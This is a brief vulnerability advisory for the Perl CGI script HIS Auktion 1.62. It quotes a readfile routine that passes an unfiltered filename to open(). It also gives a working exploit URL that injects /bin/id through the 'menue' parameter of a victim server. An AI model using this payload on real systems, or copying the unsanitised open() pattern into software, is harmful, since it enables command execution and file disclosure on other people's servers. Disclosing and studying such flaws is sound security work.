Name   : HIS Auktion 1.62: "show files" vulnurability.
About  : script "HIS Auktion 1.62" is a catalog of links CGI
         script. The creators site http://www.his-software.de
Problem: -------from auktion.pl-------
         sub readfile {
         local($filename)=$_0;
         local(@array);
         open(f,$filename);
         ----------------------------
         $filename - is not filterred on symbols.

Exploit:

lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id
                                by: UkR-XblP (cuctema@ok.ru)